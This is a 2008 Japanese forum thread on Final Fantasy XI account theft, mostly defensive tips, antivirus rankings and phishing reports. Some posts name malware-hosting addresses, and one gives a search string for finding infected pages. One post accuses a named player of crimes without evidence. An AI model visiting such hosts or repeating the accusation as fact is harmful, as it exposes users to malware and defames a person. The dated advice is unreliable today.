191 名前:既にその名前は使われています:2008/08/06(水) 11:02:02 ID:8GgKuQ9S
NoScript1.7.8上げ

192 名前:既にその名前は使われています:2008/08/06(水) 11:22:24 ID:8JonfLUC
次世代MMORPGまだー

193 名前:既にその名前は使われています:2008/08/06(水) 11:35:11 ID:lu6/Cwk9
次世代MMORPGでも垢ハックはやると思うよ?

194 名前:既にその名前は使われています:2008/08/06(水) 12:07:56 ID:97chGcBe
検知力テスト(2008年8月5日)
Most Effective Antivirus Tools Against New Malware Binaries
ttp://mtc.sri.com/live_data/av_rankings/

Rank Detects Missed Product
1st 97% 94 AntiVir
2nd 96% 106 Webwasher-Gateway
3rd 94% 158 Ikarus
4th 93% 195 BitDefender
5th 92% 223 F-Secure
6th 92% 249 AVG
7th 89% 334 Sophos
8th 89% 339 Norman
9th 89% 343 Avast
10th 87% 403 Kaspersky

195 名前:既にその名前は使われています:2008/08/06(水) 12:08:20 ID:97chGcBe
11th 85% 438 ClamAV
12th 85% 441 CAT-QuickHeal
13th 84% 494 Microsoft
14th 84% 494 VirusBuster
15th 83% 521 DrWeb
16th 80% 602 eTrust-Vet
17th 80% 607 Rising
18th 80% 608 F-Prot
19th 79% 629 Fortinet
20th 79% 642 Symantec
21st 77% 698 TheHacker
22nd 75% 769 VBA32
23rd 74% 782 AhnLab-V3
24th 74% 804 McAfee
25th 72% 842 Panda
26th 70% 915 NOD26w

196 名前:既にその名前は使われています:2008/08/06(水) 12:49:23 ID:1aQKQBnC
保守

FlashplayerのVer 9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!

197 名前:既にその名前は使われています:2008/08/06(水) 13:10:13 ID:POrVMLNI
一番大事な
パスワードを保存するな!が抜けてるぞ

198 名前:既にその名前は使われています:2008/08/06(水) 14:51:35 ID:qbmYVvAc
通販サイト「ナチュラム」で約65万件の個人情報流出の可能性
http://internet.watch.impress.co.jp/cda/news/2008/08/06/20498.html

#チラシの裏
俺、そこで昨日物を発注したところなんだぜ・・・w

199 名前:既にその名前は使われています:2008/08/06(水) 14:56:21 ID:YSfxt+/z
>>198
クレカ番号とかは登録してあったのか?
ゲーム内通貨よりもおおごとだべ

200 名前:既にその名前は使われています:2008/08/06(水) 16:41:52 ID:4dVokIGB
>>191
上げつつ情報提供ありがとう。いまupしてきた。

201 名前:既にその名前は使われています:2008/08/06(水) 17:52:06 ID:wWQMCGII
>>199
FAQ見てると2000年5月〜2008年7月10日の間だから昨日だと、この件はセーフ

202 名前:既にその名前は使われています:2008/08/06(水) 17:52:15 ID:sdiKDFAO
>>193
流行ると思うよ?
やると思うよ?

お前が元締めか!
サゲスンヂは元気ですか?

203 名前:既にその名前は使われています:2008/08/06(水) 18:07:40 ID:lu6/Cwk9
は?やるとおもうよw
サゲスンチィ〜(紀元前231〜紀元後1369)です

204 名前:既にその名前は使われています:2008/08/06(水) 19:27:13 ID:V6wLq3T3
>>203
どんな化け物だよw

205 名前:既にその名前は使われています:2008/08/06(水) 19:30:23 ID:sgByCmwX
現代のサン・ジェルマンかよwwww

206 名前:既にその名前は使われています:2008/08/06(水) 20:52:50 ID:q+oKzejx
上げましょう。

207 名前:既にその名前は使われています:2008/08/06(水) 21:14:35 ID:bufh1F48
PG2のリンク飛べないんだけど、これは違うやつです?

PeerGuardian 2 RC1 Test2-2


208 名前:既にその名前は使われています:2008/08/06(水) 21:45:18 ID:jq6M1t+z
>>207
>>6 の 4.参照で。 
安定版は 2.0 Beta 6b ですね
日本語化されてるのは今落とせないので
お急ぎの場合 本家 http://phoenixlabs.org/pg2/ から英語版をDLする感じでいかがでしょ?

無料鯖ではじめたことを若干後悔しているFF11Warningの管理人です。
orn.jpさんの鯖が火曜深夜から落ちっぱなしで朝問い合わせメール送って返事待ちっすが
時期的に orn.jpの鯖管様が帰省とかなさってた日にはいつ復旧するか不明です。
当座必要があれば ジオにミラーあるのでご利用ください。
ttp://www.geocities.jp/ff11warning/
ご迷惑をおかけして申し訳ありません。

今回のornさんの対応次第では XREA有料に移転することも考えてます。
サブドメオプションででxrea入らないのだと cute.bzか happy.nuしかないので
(あー 独自とれってのはなしでw)ちょっと悩むところなんですけどね。
ここまで 需要があるとは思ってなくて てか だれかちゃんとしたのつくりませんか?(ぼそ

209 名前:既にその名前は使われています:2008/08/06(水) 21:58:52 ID:bufh1F48
>>208

親切に有難うです。
初めての導入で日本語の方がわかりやすいかと考えていたのですが、
いつ復旧されるかもわからないので英語版DLしてみます。
FF11Warningも繋がらなかったのですが、理由があったんですねw
頑張って下さい!

210 名前:既にその名前は使われています:2008/08/06(水) 22:11:22 ID:qXUrpr6O
WebArchive経由で日本語版落とせるけど
これでいいかな?

211 名前:既にその名前は使われています:2008/08/06(水) 22:15:04 ID:qXUrpr6O
PG2の日本語版

212 名前:既にその名前は使われています:2008/08/06(水) 22:28:56 ID:jq6M1t+z
あー 落とせますね 
2008/1/20の落としてみて virustotal.に投げてみたけどだいじょぶそ。
ttp://www.virustotal.com/jp/analisis/492cc86029a51795f4c18d6e352b0803

213 名前:既にその名前は使われています:2008/08/06(水) 22:37:12 ID:bufh1F48
>>211-212

こんな便利な所あるんですね。
一番最新の所で落としてみました。
pg2-050918-nt-jpってので良いんですかね?


214 名前:既にその名前は使われています:2008/08/06(水) 22:50:14 ID:eNVONrcp
>>198
ヤベエ、俺ナチュラムでロッドやリールとかすんげぇ数買ってるわww


215 名前:既にその名前は使われています:2008/08/06(水) 22:50:53 ID:YSfxt+/z
>>214
早く被害状況を確認してこい

216 名前:既にその名前は使われています:2008/08/06(水) 23:07:53 ID:eNVONrcp
>>215
クレカ番号は登録してなかったから、とりあえず多少は安心したぜ・・・。
もうナチュラムではタックル買わねー。


217 名前:既にその名前は使われています:2008/08/06(水) 23:16:06 ID:wuxKve7S
別板のスレみてたら懐かしいのがあった
勝ってたんだね、これ
ttp://blog.livedoor.jp/yoshy2k7/

218 名前:既にその名前は使われています:2008/08/07(木) 00:21:01 ID:ofr6s+Ib
ゲームアカウントと関係あるか不明だけど
ここ数日 CNN.com Daily Top 10 というスパムが猛威を振るってます。
リンクをクリックすると flashplayerが古いよって メッセージが出てget_flash_update.exeをDLしますかってダイアログが出るらしい。
これが真っ赤な偽物でトロイらしいのでご注意ください。
実際昨日あたりから プロバイダのスパムフィルターをすり抜けて1時間に1通くらいのペースで来てます。

219 名前:既にその名前は使われています:2008/08/07(木) 00:47:37 ID:1ngviPqZ
>>218
亜種多すぎるのでなんとも言えないけどとりあえず1匹。
ttp://www.virustotal.com/analisis/7cc86acd01b4b9b5d04061e4156701f9
ネトゲトロイとは関係ないと思う。
欧米露で大量にあるインチキエロFlashのcodecを装うzlob系かと。

220 名前:既にその名前は使われています:2008/08/07(木) 01:10:09 ID:1ngviPqZ
↑検知していないMcAfeeに投げたらextra.dat(臨時パターン)が投げ返された。
正式パターンへの反映待ちの模様。
# 欧米で流行している物に対しては動きはえーなぁ。

221 名前:既にその名前は使われています:2008/08/07(木) 01:15:35 ID:8k8mnkY8
POLでHTMLメール来てて中身見たらからっぽ。
???
あきらかに業者っぽいメールだった。
そういえば、非対応メールってなんかついてたな。
何だったんだろう

222 名前:既にその名前は使われています:2008/08/07(木) 02:28:08 ID:RQY/OhBe
>>221
昔自分もそれ来てた事あるな。気味悪くて、POLのメアド変えたらぱったりこなくなったけど。
当時AH見てたんだけど、それと関係あったのかな。今思うと怖いよなあ…(;´Д`)

223 名前:既にその名前は使われています:2008/08/07(木) 03:16:14 ID:sj2SBKig
カスペルスキーのページが全然開けねえww
注意していたんだがやっちまったかな

224 名前:既にその名前は使われています:2008/08/07(木) 03:24:34 ID:SPcYwG/u
>>223
問題なく開くぞ
キャッシュクリアしてみたら

225 名前:既にその名前は使われています:2008/08/07(木) 03:28:01 ID:sj2SBKig
>>224
キャッシュクリアしてみた。
5分ほど待ってなんとかオンラインスキャンのウィンドウを出せたが普段からこんなに重かったりするのかな?
以前使ったときはもうちと早く表示されたような気がしないでもないが

スキャン結果出たらまた来ます

226 名前:既にその名前は使われています:2008/08/07(木) 04:04:17 ID:sj2SBKig
重要の項目でスキャンしたがとりあえず見つからなかったから一安心。
しかしなんであんなに重かったんだろ

227 名前:既にその名前は使われています:2008/08/07(木) 04:15:32 ID:TEYWRniI
無料オンラインスキャンばっかしてないでソフト買えよwww

228 名前:既にその名前は使われています:2008/08/07(木) 04:52:39 ID:rrhfCmPb
英語版PG2の設定は、あたりまえですけど日本語使えないから注意で
リストの説明を日本語で書いちゃうとエラーで設定したリストが飛びます

229 名前:既にその名前は使われています:2008/08/07(木) 05:11:24 ID:m7A5EBDl
2時間程前にHPを回っていたらPG2がガードしたので、調べたらどうもハックサイトらしくソースやら
色々と調べてみたけどよくわからず・・・分かる人居ましたらお願いします。
オタ臭くて申し訳ないけどサイトはここ。
tp://m-ex○jp/
TOPは平気なようで、ここの「サークル」って所をクリックすると666○lyzh○comの送信先IP 208○73○210○32
をブロックしたと警告が。
aguseで調べるとサーチサイト?みたいだけどやはりよく分からず。
取りあえずカスペオンラインは検出0、この後入れてあるバスター2008とAd-Awareで調べて見るつもりです。

230 名前:既にその名前は使われています:2008/08/07(木) 05:32:20 ID:EcVLC5Sj
>>229
aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。おそらく過去に
このドメインを使用してウィルス撒き散らした可能性がある。
必ずしもこのサイトとは言えないし改竄された可能性もある。
ブロックしたと出たのなら問題ないと思われるが
スキャンはしておいたほうがいいね。

231 名前:既にその名前は使われています:2008/08/07(木) 06:35:36 ID:9hmgW/Fz
>>230
>>aguseのカスペスキャンではウィルスは無いって出てるけど
ネットクラフトって会社が危険と判別してる。

このNetcraftってとこ、どこのブログでもCAUTIONの判定出る気がする。
よく見に行くブログがあって見る前はいつもチェックかけてるんだけど、
昨日チェックかけたら危険と判別されたよ。
気になったんで同社の他のジャンルのブログとか
他社のブログ(Seesaaとか忍者ブログとか)を複数、ジャンル問わずで無作為に選んで
チェックかけてみたけど、どれもCAUTIONの判別が出てる。
>>229の件はブログじゃないみたいだし、誤判断とは言い切れないんだけど、
これってNetcraftの判別のほうがおかしくなってる可能性はないかな?

長文失礼、あと前スレやこのスレですでに話題で出てて見逃してたら申し訳ない。

232 名前:既にその名前は使われています:2008/08/07(木) 06:48:05 ID:EcVLC5Sj
>Netcraftの判別のほうがおかしくなってる可能性はないかな?

可能性はあるね。ただ俺が言いたかったのはブロックされた理由。
誤認識にせよ、絶対安全とは言えないからスキャンはしたほうがいいと思う。

233 名前:既にその名前は使われています:2008/08/07(木) 06:57:36 ID:9hmgW/Fz
>>232
>>ただ俺が言いたかったのはブロックされた理由。

まずレスありがとう。
上の件なんだけど書き込みしてから「あ、ブロックされたんだっけ」と思った・・。
その事が抜けた書き込みになってしまったのは申し訳ない。
PG2がブロックしてるなら何か引っかかるものがあったんだろうね。
言われてる通り、スキャンはしたほうがいいと思うのは同意。
私自身が気になったのと、もしまだNetcraftの判別の件で出てなければ
今後何か多少の情報にでもなるかな?と思って書き込みさせてもらいました。
そろそろ家出ないといけない時間なのでこのレスで終わりにします。ありがとう。

234 名前:既にその名前は使われています:2008/08/07(木) 08:50:07 ID:VJf5Dzg3
保守ついでに↓
FlashplayerのVer 9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!
パスワードを保存するな!

235 名前:他スレからコピペ注意喚起:2008/08/07(木) 10:39:03 ID:3De8s2s1
292 名前:mixi不審メッセージ多発中 本日のレス 投稿日:2008/08/07(木) 01:09:11 ESNCoYju
前スレ落ちたから、ここで報告。
mixiにて不審メッセージ多発中。  id=16616048
誰か、踏んでくれwwww
以下コピペ

件名:はじめまして

●●●●さん
はじめまして。
三重県から上京してきました。
仕事で全国各地と世界中を旅しています。
プロフィールを見て●●●●さんのことが好きになりました。
ttp●//ameblo●jp/momomanboo/
よろしければ、マイミクお願いいたします。

236 名前:既にその名前は使われています:2008/08/07(木) 11:15:07 ID:1ngviPqZ
↑アカハック関係無し。

237 名前:既にその名前は使われています:2008/08/07(木) 11:22:46 ID:EcVLC5Sj
Linuxで見てきたが、サイトは胡散臭い記事2件になにかの講座?の宣伝だけ。
ソース内には不明のリンク2件だがどれもJPドメイン。
アカハックよりは宣伝だと思われる。

238 名前:既にその名前は使われています:2008/08/07(木) 11:58:59 ID:pXrtYDAA
Dr.Web1.0.18きたぞー

239 名前:既にその名前は使われています:2008/08/07(木) 13:53:00 ID:VJf5Dzg3
保守

FlashplayerのVer 9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!
パスワードを保存するな!

240 名前:既にその名前は使われています:2008/08/07(木) 14:09:13 ID:SPcYwG/u
POL以外を全面シャットアウトしても安心出来ん

241 名前:既にその名前は使われています:2008/08/07(木) 14:15:42 ID:lyTQvvNI
admin●microsoft●comからIE7をDLしろって英文メールきた
MSN FEATURED OFFERSての
これフィッシング?
コレ、クリックしたらしこまれる?
と思って削除した

242 名前:既にその名前は使われています:2008/08/07(木) 14:20:40 ID:CccsGcHM
アフォしかいねぇな

243 名前:既にその名前は使われています:2008/08/07(木) 14:34:09 ID:VmDm/cud
釣りだろ

244 名前:既にその名前は使われています:2008/08/07(木) 14:34:24 ID:z7FdMK4Z
ティルテュのFF11日記ってところ見たら、画面になにも出なくて
aguseしてみたら、フィッシングサイトの注意が出た。なんなの、どうなるの?

245 名前:既にその名前は使われています:2008/08/07(木) 14:35:28 ID:EcVLC5Sj
>>240
論理的にPCが■以外のIPアドレスに接続できない状態なら安全なはずだが、
すでに何かのプログラムが入り込んでいて、ルーターを直接ハックされたり、
プロキシの設定を変更されてハック先に串さすような設定されていると
垢ハックされる。もちろんIPフィルタに細工される可能性もある。

>>241
表示されるメールアドレスと実際の送ってきたメールアドレスが違う場合がある。
面識のない人から送られてきたリンクやアタッチメントは絶対にあけないように。
もちろん知り合いのふりをしたウィルスメールもくるので面識があっても疑ってかかるように。

246 名前:既にその名前は使われています:2008/08/07(木) 14:36:53 ID:WDakFldd
>>244
可及的速やかにカスペかどっかでスキャンしる。
あと、パスをHDDに保存していないのなら慌てて変更する必要は一応無い
感染した状態で「罠サイト見た!パスかえなきゃ!」とやると通信時に逆に抜かれてしまうからね。

247 名前:既にその名前は使われています:2008/08/07(木) 14:42:41 ID:EcVLC5Sj
>>244
fc2だから改竄されてて、その時ブラックリストに追加されたかなんかだろ。
Linuxで見たが普通にでてくるし、aguseでもNetcraft以外は安全と出とる。
もちろんNoScriptとIFrame設定はきちんとしてるよな?

248 名前:既にその名前は使われています:2008/08/07(木) 14:46:59 ID:hKMtiLz1
>>102 にあったhttp://miku.a.orn.jp/miku2/ が開けなくなってるんですが
リンク切れ?

249 名前:既にその名前は使われています:2008/08/07(木) 14:48:19 ID:WDakFldd
>>248
>>208

250 名前:既にその名前は使われています:2008/08/07(木) 15:46:28 ID:kbx1ksvQ
未対応とかいう表示のメールがPOLにきた
>>221のやつかな〜

251 名前:既にその名前は使われています:2008/08/07(木) 16:00:53 ID:lyTQvvNI
>>245
ありがとうございます

252 名前:既にその名前は使われています:2008/08/07(木) 17:32:50 ID:VmDm/cud
メールパスとっくに分からなくなってるから安全^^v

253 名前:既にその名前は使われています:2008/08/07(木) 17:56:40 ID:z5fo8iWR
1から復帰を考えてるけど、どのサイトが今のところ安全なのかわからないからしり込み(´・ω・`)

254 名前:既にその名前は使われています:2008/08/07(木) 17:59:09 ID:RaR4ck2H
絶対安全!てのはありえないに近いからなwうかつに教えられんw

255 名前:既にその名前は使われています:2008/08/07(木) 19:17:27 ID:sx02QNNf
NoScript 1.7.8来てたage

256 名前:既にその名前は使われています:2008/08/07(木) 19:22:33 ID:h6nWJTzQ
うんこおおおお

257 名前:既にその名前は使われています:2008/08/07(木) 19:23:01 ID:UD8KxMEc
>>255
>>191

258 名前:既にその名前は使われています:2008/08/07(木) 20:22:01 ID:VaWgYlwZ
>>241
うちにもそのメールきた。
怪しげだったので、プロパティで差出人を見たら自己アドレス、更に返送時(?)のアドレスが知らないアドレス宛が表示されてて
気持ち悪かったから、問答無用で削除した。
中を開かず、そのままプロパティから詳細・ソースみる限り何か書いてリンクはってた感じたったなー。

それ以前に、自分のはすでにIE7だから不要のものだ。

259 名前:既にその名前は使われています:2008/08/07(木) 20:42:56 ID:5ts1o4Yx
Itmedia:国内で1万ページに被害か:Webサイト改ざん被害が急増、7月の国内ウイルスリポート

ttp://www.itmedia.co.jp/enterprise/articles/0808/05/news056.html

>トレンドマイクロは8月5日、国内を対象とした7月の「インターネット脅威マンスリーレポート」を発表した。

>7月の不正プログラム感染報告数は、前月比2136件増の6368件となった。
>報告数のトップは、オンラインゲーム関連情報の盗難を目的とした「TROJ_CABAT」の163件で、
>同種のほかオンラインゲームの情報を標的するウイルスがトップ10の半数を占めた。

>同社では、7月17日にSQLインジェクション攻撃によってWebサイト改ざん被害が拡大していると警告。
>世界全体で最大21万ページ、国内で約1万ページが「TROJ_ASPROX」によって改ざんされた疑いがあるという。

260 名前:既にその名前は使われています:2008/08/07(木) 20:53:22 ID:UJccFlxz
不正アクセス専用チャットサポート、8月11日(月)を臨時休業。

社会人がようやっと夏休みに入る途端にこの仕打ちwww
次は盆休みもありそうだなw

261 名前:既にその名前は使われています:2008/08/07(木) 20:54:09 ID:WDakFldd
>>260
うへー
しかも肝心の月曜日かよ。

262 名前:既にその名前は使われています:2008/08/07(木) 20:54:49 ID:1ngviPqZ
チャットサポートする人も社会人でようやっと夏休みなんですよ^^;

263 名前:既にその名前は使われています:2008/08/07(木) 21:08:26 ID:UJccFlxz
■e<お盆休みは12〜15日です^^

264 名前:既にその名前は使われています:2008/08/07(木) 22:58:21 ID:O/LSvF5z
詩人テンプレが改竄されていた模様。警告age

【吟遊詩人】♪やっと来た新アビ♪【第九十五楽章】
http://yy28.kakiko.com/test/read.cgi/ff11jobjobplus/1212050393/793


265 名前:既にその名前は使われています:2008/08/07(木) 22:58:27 ID:EAinJDW/
社会人のひとさ〜質問〜
夏休みって4日くらい?ないとか?

266 名前:既にその名前は使われています:2008/08/07(木) 23:03:13 ID:EAinJDW/
ひきこもりしかいないかな?
スクエニに休みはいつですかって聞いたら答えられませんって言われたから
休みないのかと思ったけどそうじゃないみたいね

267 名前:既にその名前は使われています:2008/08/07(木) 23:04:09 ID:WDakFldd
>>265
うちは5日間自由な日に予約入れてとってた。
医療関係で休めない職種だからだけどね

268 名前:既にその名前は使われています:2008/08/07(木) 23:11:03 ID:EAinJDW/
>>267
どもです〜社会人ってそんなに休み無いんだね。
なんかやだな

269 名前:既にその名前は使われています:2008/08/07(木) 23:31:41 ID:5wy+2SUL
>>268
3日しか出ないところとかもあるぞ。

270 名前:既にその名前は使われています:2008/08/07(木) 23:35:56 ID:m7A5EBDl
>>230>>233
レス有難うございます。
その後、バスターとAd-Awareでもチェックした所どちらも検出はされませんでした。
Netcraftについてはいくつか回ってみましたが、うちでもやはり問題無さそうな所でも
CAUTIONの出る確率が高いですね〜
あとは、やはりブロックされた理由が分からないのがちょっと気になりますねorz
一応大丈夫そうですが、まだ分からないので気を抜かず注意しようと思います。

271 名前:既にその名前は使われています:2008/08/07(木) 23:50:50 ID:5ts1o4Yx
>>264
6月のXREA広告改竄の時に飛ばされたアカハクトロイ置き場行きのスクリプトしこまれてたみたいだね。
ちょっとヤバいのう。

272 名前:既にその名前は使われています:2008/08/08(金) 00:08:40 ID:u810Uygh
>>208 ttp://miku.a.orn.jp/miku2/続報 私用でスレを使い申し訳ありません。
落雷が原因かと思ってましたがorn.jp様がトラフィックオーバーでプロバから利用停止されちゃったようです。
鯖管様のブログ ttp://d.hatena.ne.jp/orn/
安定復旧の見通しが暗そうなので ジオのミラーは.htaccessが使えないのでミラーのままとして
メインサイトを 広告免除のXREA+ http://miku.xrea.jp/ に移すことにしました。
それに伴いタイトルを FF11アカハクから FF11WARNINGにしました。
ttp://miku.a.orn.jp/のアカウントはは 悪用されないように利用停止しないで残しますので
復帰するようなら ttp://miku.a.orn.jp/からもリンクは張りますが
もしお手数でなければ 飛び先確認後 スレ内からリンクを踏んでいただけると
検索エンジンでのヒットが早くなると思います。
勢いでこのスレのテンプレっぽいのもうp http://miku.xrea.jp/template

CGI部分に関しては 徐々に移設予定です。デスマ中に付き簡単で申し訳ないですがご報告まで。

273 名前:既にその名前は使われています:2008/08/08(金) 00:11:46 ID:cL25FzLo
>>272
乙っす
わざわざ有料にするなんて本当に乙っす

274 名前:既にその名前は使われています:2008/08/08(金) 00:18:39 ID:To5BkrnS
FFHOOKて、改斬とか言うツールのdllだっけ?



275 名前:既にその名前は使われています:2008/08/08(金) 00:29:39 ID:dVfI4H/P
そう

276 名前:既にその名前は使われています:2008/08/08(金) 00:46:23 ID:To5BkrnS
FFもしてないインターネット用PCからこいつが出てきたんだが

なぜか、サイトアドバイザーの中に「FF」というフォルダーがあるんだ

277 名前:既にその名前は使われています:2008/08/08(金) 00:46:38 ID:9IhBSvS/
そのファイルはやばいんでは…

278 名前:既にその名前は使われています:2008/08/08(金) 00:49:28 ID:EJkan9mG
つか詩人テンプレサイト改竄の件いろんな意味でヤバくないかい

サイトの中身そのものがいじられて罠スクリプトしこまれたんだろ?
外部呼び出しの広告に仕込まれたAHだのXREAだのの時と訳が違うぞ・・・

279 名前:既にその名前は使われています:2008/08/08(金) 00:49:45 ID:JewjYBv1
>>276
kwsk

280 名前:既にその名前は使われています:2008/08/08(金) 00:52:02 ID:cL25FzLo
>>278
何をおっしゃいますか
むしろこっちの手口の方が前は主流だったんだよ
一昔前に流行ったやつなら「2117966」とか「2117966 script」で検索すれば詳細や
感染ページが出てくる。ただし踏むときは自己責任な

281 名前:既にその名前は使われています:2008/08/08(金) 00:58:21 ID:To5BkrnS
Noスクリプトなどいれてセキュリティーは全てしてあった

で、挙動がおかしくなったのは昨日の夜、火狐がサイトアドバイザーがおかしいメッセ>PC再起動>深刻なダメージエラー

C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\Mini080608-01.dmp
C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\sysdata.xml

PC起動後FWのプログラムコントロールに見たことないns8.tmpなどが居た

ウイルススキャンは全て問題なしだがどうもおかしい


282 名前:既にその名前は使われています:2008/08/08(金) 01:10:54 ID:dVfI4H/P
>>278
FONの無線ルーター改造まとめWikiとかも改竄されてたことあったぞ。
勿論、FFアカハックのスパイウェアへ誘導。

283 名前:既にその名前は使われています:2008/08/08(金) 01:24:01 ID:EJkan9mG
>>280
そーなのかー
>>282
いや、wikiとかの外部編集可能なサイトの改竄なら頻発してたけれど、
基本的に管理者以外いじれないタイプのサイトの改竄を聞いたのは
ヴァナモンに変なの仕込まれた以来だったからさ。
ちっとやばげだなーと

284 名前:既にその名前は使われています:2008/08/08(金) 01:25:03 ID:+POA1Xld
板を見てきた
> 1039045744:88/jp■js
1039045744はロングIPアドレス表記ってやつだ。
読み替えると
61.238.148.112
になり、このIPは香港(61.238.0.0/16)。
以下の参考アドレスにもあるけどIPアドレスの表記方法はブラウザ等が
対応しているかは置いておくとしても結構バリエーションがあるので
NGワード等での対応はきっついやねぇ。


参考:
http://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9

285 名前:既にその名前は使われています:2008/08/08(金) 01:42:15 ID:NuROt4+G
【表題変更】<こんな感じでいいかしら

●● RMT業者の垢ハックが多発している件3○ ●●

■テンプレ = http://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)

前スレ ●● RMT業者の垢ハックが多発している件35 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217834363/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
  受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
      (スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(垢ハックについての対策とか詳しく載ってます) http://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/

★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
★別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●●
       http://changi.2ch.net/test/read.cgi/ogame/1216987350/

286 名前:既にその名前は使われています:2008/08/08(金) 02:39:21 ID:h6XUeWyF
PG2導入したのはいいんだけど、しきりに192.168.11.255って
IPにアクセスしてるみたいなんだが、これはなんなんだろう・・・

287 名前:既にその名前は使われています:2008/08/08(金) 02:44:09 ID:mu62A/zw
それあんたのIP

288 名前:既にその名前は使われています:2008/08/08(金) 02:45:36 ID:KSFXv0yS
>>286
ブロードキャストアドレスでぐぐるといいかも。

289 名前:既にその名前は使われています:2008/08/08(金) 02:57:23 ID:LzDYeJuO
職人の庭開いたらPG2が反応しまくりなんだけど、これって真っ黒ですか?

290 名前:既にその名前は使われています:2008/08/08(金) 02:58:23 ID:h6XUeWyF
>>287-288
なるほど、勉強になりました。
あと、ブロックされたものでOhio State Universityて名前と
LAN University ofて名前の所からのをブロックしてたんですが、
これはわかります?


291 名前:既にその名前は使われています:2008/08/08(金) 03:00:04 ID:ZQwVnqzb
>>290
オハイオ州なんか中華ネトゲアカハックとは関係ないだろ。
ネットは日常的に攻撃パケット飛び交ってんだから気にすんな。

292 名前:既にその名前は使われています:2008/08/08(金) 03:03:44 ID:ZQwVnqzb
>>264 >>284
検体拾ったので各社に発射しました。

293 名前:既にその名前は使われています:2008/08/08(金) 03:07:19 ID:h6XUeWyF
>>291
一回垢ハクされてやっと復旧したんで、ちと神経質に・・・
チキンで申し訳ない
夜遅くにすまんかったです


294 名前:既にその名前は使われています:2008/08/08(金) 03:07:57 ID:nzBGQ2yp
PG2は単に、ブロックリスト内に載っているアドレスへのアクセスを遮断するだけで、
そのアドレスが危険かどうかは関知していない
デフォルトのリストは、P2Pソフトを使う際に企業や官公庁、著作権団体等のアクセスを遮断することを
目的に作られてるので、デフォルトのリストを使うと割と見たこともない遮断ログに出会う
中韓のリストに反応しない限り気にしなくていいよ

295 名前:既にその名前は使われています:2008/08/08(金) 03:12:51 ID:h6XUeWyF
>>294
P2Pのブロックをはずした方がいいってのはそこから来てるんですね。
よくわかりました。ありがとうです


296 名前:既にその名前は使われています:2008/08/08(金) 03:20:36 ID:O3G6Yny3
夏休みなにそれ食べられるの?

297 名前:既にその名前は使われています:2008/08/08(金) 03:23:01 ID:/7Af3Axz
fc2のblogをaguseしたら
Netcraft 民間企業Netcraftによるフィッシングあるいは脆弱性のブラックリスト がCoutionだった場合
あぶない?

298 名前:既にその名前は使われています:2008/08/08(金) 03:33:08 ID:/7Af3Axz
同じFC2でもblog5.fc2.com鯖では問題なし
blog118.fc2.com鯖でCAUTIONがでます


299 名前:既にその名前は使われています:2008/08/08(金) 03:33:42 ID:ZQwVnqzb
>>297
>>231

300 名前:既にその名前は使われています:2008/08/08(金) 04:54:15 ID:Zm83S7t2
>>281

まったく同じエラーが時々起こるんですが・・・

301 名前:既にその名前は使われています:2008/08/08(金) 07:00:37 ID:VunZ1AlG
polのGMチャットは公式からもやらせてほしいなー

302 名前:既にその名前は使われています:2008/08/08(金) 07:04:40 ID:QyE2BUYY
>>300
それは至急オプションからみ

303 名前:既にその名前は使われています:2008/08/08(金) 10:51:28 ID:tzMX0IhN
保守
Flashplayer    Ver9.0.124.0にしよう!
Realplayer    使わないなら削除しよう!
WindowsUpdate   常に最新にしよう!
パスワード    は保存しない!

304 名前:既にその名前は使われています:2008/08/08(金) 11:21:39 ID:z0dd+6Y/
973 :既にその名前は使われています :2008/08/04(月) 17:16:49 ID:j2hDP0O9
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。


POL起動直後のログイン画面でメンバーパスワードやセキュリティ設定をしても、
別の端末からは普通に入れてしまうってなんなの

305 名前:既にその名前は使われています:2008/08/08(金) 11:36:59 ID:vhAXtfBj
当然だわなw

306 名前:既にその名前は使われています:2008/08/08(金) 11:50:14 ID:ZqPm0c0b
これほんと意味ないよな。
IDとパス、それと暗号コードがセットじゃなきゃ別の端末からは
ログインできない仕様だったら効果あったものを。

307 名前:既にその名前は使われています:2008/08/08(金) 11:51:55 ID:ilyPS4+r
Kujata最強のダークサイド リアル監禁王子Winoa(ヒュム♀F8)

○垢ハック
○借りパク
○リアルストーカーで警察沙汰
○リアル婦女暴行未遂)警察が関与・監視
○リアル拉致監禁未遂)警察が関与・監視

本人曰く【警察が関わろうが俺には関係ない、警察など怖くない】という発言をしている
自称イケメンらしい
口から生まれた男と言われたこともあり口先だけの約束や、その場を切り抜けるための心得は身につけている
リアルでもヴァナでも知り合いの人は気をつけられたし
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50

308 名前:既にその名前は使われています:2008/08/08(金) 11:53:48 ID:9IhBSvS/
IDとパスさえあればPSからなんの問題もなく入れるしね。

309 名前:既にその名前は使われています:2008/08/08(金) 12:04:12 ID:VunZ1AlG
夏休みの社会人さん、厨な質問で悪いのですがどうかお答え下さい。
アカ復元の為に免許証コピーをスクエニに送るのですが
送り方って、適当な封筒に入れて送ればいいのでしょうか?
また、切手は幾らのですか?(入らなかったり?)

FAXなら楽ですが、駄目ですよね?

310 名前:既にその名前は使われています:2008/08/08(金) 12:09:27 ID:p/ey7si0
↓行ったほうが経験者多いと思う

